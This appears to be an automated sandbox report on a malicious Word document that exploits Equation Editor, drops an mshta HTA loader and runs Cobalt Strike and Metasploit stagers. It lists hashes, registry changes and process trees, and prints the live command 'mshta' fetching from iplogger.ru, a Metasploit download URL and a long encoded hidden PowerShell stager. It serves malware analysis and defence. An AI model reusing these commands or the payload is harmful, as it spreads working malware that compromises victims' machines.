cobaltstrike | 3e0ebb2b2f40a667f9d1cbf745cc77723c82b08fb9e9bfb8dccd39f7902b3b39

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
17-04-2024 12:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

=?Windows-1251?Q?=F0=E5=EA=EB=E0=EC=E0=F6=E8=FF=5F=E8=F1=F5=5F05=2E04=2E24=2Edoc?=.docx
Size

144KB
MD5

5667aa62833dd6ebd15da40130ab963d
SHA1

e50b2c20fe2151860c08cb1dba5022fbeb666c69
SHA256

d6fff4f67fb27def06611ed233e79f4b44a2c4daa320ae30c5054e98cf26af11
SHA512

51009f82ea1bf71fe56be1f8377aeba6ae09731e3457b5b86f7678fa240c33296d76a55608fcf420d5226e859349a90b0e9c6ad08ea9f50b514f80702d416028
SSDEEP

3072:MFWZl74EhdqpH7R4S8IuUih1pj8aSFhb9/roD5/pEzz0rEZNje:MFWZSOdqp2SaUUohblclGVZM

Score

10^/10

cobaltstrike metasploit backdoor trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://iplogger.ru/openai.jpg

Extracted

Family

metasploit

Version

windows/download_exec

http://forensics.jwork.ru:2083/jquery-3.3.1.slim.min.js

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 12 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
10	1860	mshta.exe
12	1860	mshta.exe
13	1860	mshta.exe
16	2844	powershell.exe
18	2844	powershell.exe
19	2844	powershell.exe
20	2844	powershell.exe
24	2844	powershell.exe
26	2844	powershell.exe
28	2844	powershell.exe
29	2844	powershell.exe
30	2844	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1508 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1508	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2952 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2844 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2844 powershell.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

WINWORD.EXE

pid process

2952 WINWORD.EXE
2952 WINWORD.EXE
2952 WINWORD.EXE

pid	process
2952	WINWORD.EXE

pid	process
2844	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2844	powershell.exe

pid	process
2952	WINWORD.EXE
2952	WINWORD.EXE
2952	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WINWORD.EXEEQNEDT32.EXEmshta.exe

description	pid	process	target process
PID 2952 wrote to memory of 2660	2952	WINWORD.EXE	splwow64.exe
PID 2952 wrote to memory of 2660	2952	WINWORD.EXE	splwow64.exe
PID 2952 wrote to memory of 2660	2952	WINWORD.EXE	splwow64.exe
PID 2952 wrote to memory of 2660	2952	WINWORD.EXE	splwow64.exe
PID 1508 wrote to memory of 1860	1508	EQNEDT32.EXE	mshta.exe
PID 1508 wrote to memory of 1860	1508	EQNEDT32.EXE	mshta.exe
PID 1508 wrote to memory of 1860	1508	EQNEDT32.EXE	mshta.exe
PID 1508 wrote to memory of 1860	1508	EQNEDT32.EXE	mshta.exe
PID 1860 wrote to memory of 2844	1860	mshta.exe	powershell.exe
PID 1860 wrote to memory of 2844	1860	mshta.exe	powershell.exe
PID 1860 wrote to memory of 2844	1860	mshta.exe	powershell.exe
PID 1860 wrote to memory of 2844	1860	mshta.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\=_Windows-1251_Q_=F0=E5=EA=EB=E0=EC=E0=F6=E8=FF=5F=E8=F1=F5=5F05=2E04=2E24=2Edoc_=.docx"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2952

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2660

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\mshta.exe
mshta https://iplogger.ru/openai.jpg
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAbwB3AEwAMABSAGoAZABVADEAdQAxAHkARQBWAFIASQBYAEwAegBsAGoAZQBWAFEAaABpAFYATQBBAEwAQwBJAE8ASwA3ACsAOQAvAGYAQgBqAFcAYgBQAFoAcwA5AFoANgB2AE8AUwBaAFcAVgBZAGEAWQB2AFQAegAvAFQAMwBUAFEANgBJAHIAYwA2AGkAVgB5AGIAeQBJAEcARABxAE4AcwBKAGkAbQBJADMAOABLAG0ANwBVAHUAbAA2AGEAMwBuAEkASgBYAEYAQQBmAGEARwArAGwAawB1AHIAeABMAGQASgBmAHAAUQB2AFgAdABhAEkAdgBJAFIAUgBZAEwAOQBZAGoAaABPAGgATwBLAGIAKwBMAGwAMgBOAHIAYwBqAGEAVQBwAFgAcgB2AFIAVwA5AGIAQQBNAG4AdwBhAGgARwBGAFEAKwA1AEkASABLAFMAQwBGAFcAdgByAGsAcABYAHgAVgBiAGkAeAA5AFkASwB2AGYAZwBXAGMAZgBmAG8AWgBZAHYASQBKAG4AQgBpAGMARgBSADUAWQBzAE8AUQBEADcAYQBXADYAegA5AC8ALwBzAHcAbABVAFkAUgA4AGMAbgBxAHUAOQB4AEIAaAA0AHgAaAB0AGwAOQBoAEYAYwBhAFYASwBmAGEATwBtAEcAeABTAGgAMgA4AGYAbABLADcASQBKADkAVABkADEALwBWAEwAdgA0AFcAQgBwADQAYgBOAFkAeABsAG4AMgBCAG8ASgBpAGYAUwBjAC8ARwB3AFcAMgBsAFUAZABRADEAMABQAHMAawBrAHIANQByADcALwBLADEAYQBkAGIANQByAGsAdQA3AEIASQBMAHgANQBXAHkAbgBzAFUARQBiAGUAcwBPAHgAdQBVAHEAOQBiADIAYQBPAHoAUwB5AEUARgBYAEsAcwBtAHQASABRAFIAeQBzAFMASAAzAHEAKwBvADIANwB1AGwAbQBnAFYAdwByAHcAOABnAGwANwB1AFgAcQBPAGIAQgAxAGEARQBNAGYAdgBnADgAeQB0AG4AbgBRAHEAWgBWAGkATwBnAFIAdgAyAHgARwBHADUAUgBqADMAbAAvAHAANgBlAG4ANgBtAHYAYgAyAGkAMAB4AEMAZgB1AEYAdABVAGwAbgA2AEEAbwBDAEgAVQBVADcAVgAwAGIAeABmAFcAKwA1AFQAcwBZAGEAVwBnAEYAYQB1AFUAWQByAHQAQgBmAGwANgBzAEEASQBrAEkAawBpAFgAegBxAGcAZwBYADAAOQBvAEcASABLAHQAZAArAGcAbgBFAE4ANwBEADcAOQBxAGQAMwBuAGkAbwBMAFMAQwA3AGwALwBxAGwAUgA1AHIAdwBSAFMAWQB4AEoAVgBhACsAZQBjACsAQgBNADYANQBDAEoAdgBUAHUAWQBnAG4ARgAvAFEAdgAwAHUAdQBLAHYAegA5AGsAbQBEAFYAMAB2AGYAUwBCADYAbgBxAEkASQB6AFcARgBrAEUAdgBCAFAAaAA5AGwANgB1AGwAcQA2AHUAbgBZAG8AawBnAG4AcwBvADQAaQBOADEAQwA3AHcAdABGADEAeQBnAFoAUQBGAGcAawBpAEwATAA4AE8AbwAwAG8AUQBkAFgAbgBIAC8AZAB6AGMAbgB2AFIAagBHAHUALwBOAGMAUgBjAHQATQA0ADYAcAArAHMANQA0AGYAaABDAFAAVQAwAEMAMQAzAGsAdQBYAFYAVgBMADUAKwB6AEoAOQAxACsAVwBpAFkAcwBkAEYATwBYAG4AdgA2ADgARwBIAHEAMQBjAEgALwBHAFoAYgAyADEAZAArADUATAB3AGwAWQAvAHUARABLADAAdwBLAHYAaQBvAFgAOABRAFUAdwBGAGsAcABuAHcAKwBRAHcANQAvAFoASwBlAGUARQBQAHYAMgBxAEoAbQB4AGQAOABxAGIAYgBQAFkARgBqAGIAYgBqADMARwBGAEIAQgBTAGwAUgAvAEIAbgBPADYAdwAwAHAAWgA4AG0AVwAwAEIAZgA1AE8AegA1AEMAbQAxAHkAcwBvAE0AMwBTAFIAUABwAGQAVwBkAHYARwBlAFAAKwBlADUAegBHAEUAcgBqAG0AdgBVAE8ASQBFADYAdAAyAHUAVQBqAGkAeQBNAG4AQgByAEYAKwByAEYANwBQAG0ASQBUAEUAaABUAEwAOABnACsANABjAG8ASwBKAGEAMQBzAHgAdQBaAGgANwByAG4ANQBBADYAZABrADEARgAvAGgAUQBNAFkAawBOAHQAdwBzADAARwBIAHEASQBiAE4AZgBDAE8AUwBzADEAcQB1ADgANgBxAEoAdgBwADcAdgBvAEMAbwBmAHcAaABKADUAeQBGAE0AWgBRAGMAVwBOAHIARABuAGMAQgBPAHoAbwBWAE8AOABwAHkASgBuAE4AcQAvADUAMABlADEAcgBpAE0AaQBiAFUATwBNAHQAaQBCAGQAZABDAEUAUgBXADIAdgBvAE8AZQBlAEsASwB0AEwATgBXAGkATwBuAC8AQgA5AGcAWAArAHIAawBWAEIAUQA1AFYAeABlAFMAMwBvAEcARwBCAE4AQgB4AFEARwByAFUAeABJADAASQA5AEwAVgB5ADcAWgBmAEUAKwA5AC8AZwAvAGQAeABpAGYAbwBMAEoAUgBlAGgAOABrAFoAVwBpAEUASgArADYARwBjAG4ATAA1AFgAcgAvAFkAdQBlAHYAbAB5ADkAdgBUAEIAYQA4AFIAUQBRADQARQA2AE4AZwAyADcAVgBpADEARwByAHEAUgBSAE8AcgBsAEIAdgB0AFoAQwBkAGwAOABxAHYAYQBpAG4AcgBDAFgAdQB6AHYAKwBvAEkAQgB2AHoAMwA4AEcAagB0AFIARwBJADAARwBXAHQAagBWAFIAcgBhAFEAUABJADcANwA5AEcAQQBsAHEAVwAyACsAbQBhAFMASgBsAEIAaABkAHUAaQBIAFMASQBIAGYAYwA5AFkAUwBWAHQASAA4AE0ANQBrAHkAeQBiAFQASgBPAEsATwAwAFYAMgBJAHMAZgBkAHYAMgBZAGwALwBZADgAMgA3AC8AYgBCAFcASgByADcAWABiAE8AZABrADcANgA2AGoASgBsAGwAagBOAEoAZgBGAGoAMgB4AEcAWgAvAEUAbwB1ADUAZgBGAC8AYQBkADgAVQBkADEAdwBsAGcALwBVAG4AYQBjADgARQBBADkATgBxAHQAMABPACsAbQBUAGgATQBKAGcAeABhAGEAagBlAHkAMABRAGQAcgBJAFcAaAArAHkANABlAFIARwBwADUAbgBlAEoARgBOAEcARQB5AEYAVQBkAE4AOABaAEwAUgBsAFYASABDAGoASAB1AHcAeABpAGcAcgBqADAAUgBsACsAagBIAGYAagBwAEIAOAB4AE0AQQA4AFAAdQB4AEwAdAArAEgAaQAvAHEAagBuAGEAMgBQAHgAaABJAC8AVQBHAG0AcAAyAHcAawBaAFUAcABxADAANABUAGUAUgBVAGYAYwBHAEMAKwBPADIAYQA0AE4AKwBrAG8AVABPAEQAbgBvAG0AYQB3ADEAVwA4ADcAQgBuAG8AbQBwAFAAVgBOAEcAVwBYACsAdQA5AE0ARABIAEwAcABtAHUAbQAzADEAbABGAEIAegBZAFYANgBrAFYAOABiAHIAdQBIAEgAWABqAHcATwBqAE0AQQB1ACsAdABtAGQAMwB4ADAAOABLAC8ANwBoAHgAUwB4ADQAdwBmAEIAdwBhAFoATgA4AGIAVwB0AHAAbABsAGYAawB1AFgAWABxAFgARAB5AEEANwBKAFoARABaAG8AUgBWAGIARwBoAFMATQBYAEwAYgBzAHIAawB0AHMAZABqAEIAYgByAFEAVQBlAEEAdABVAEEA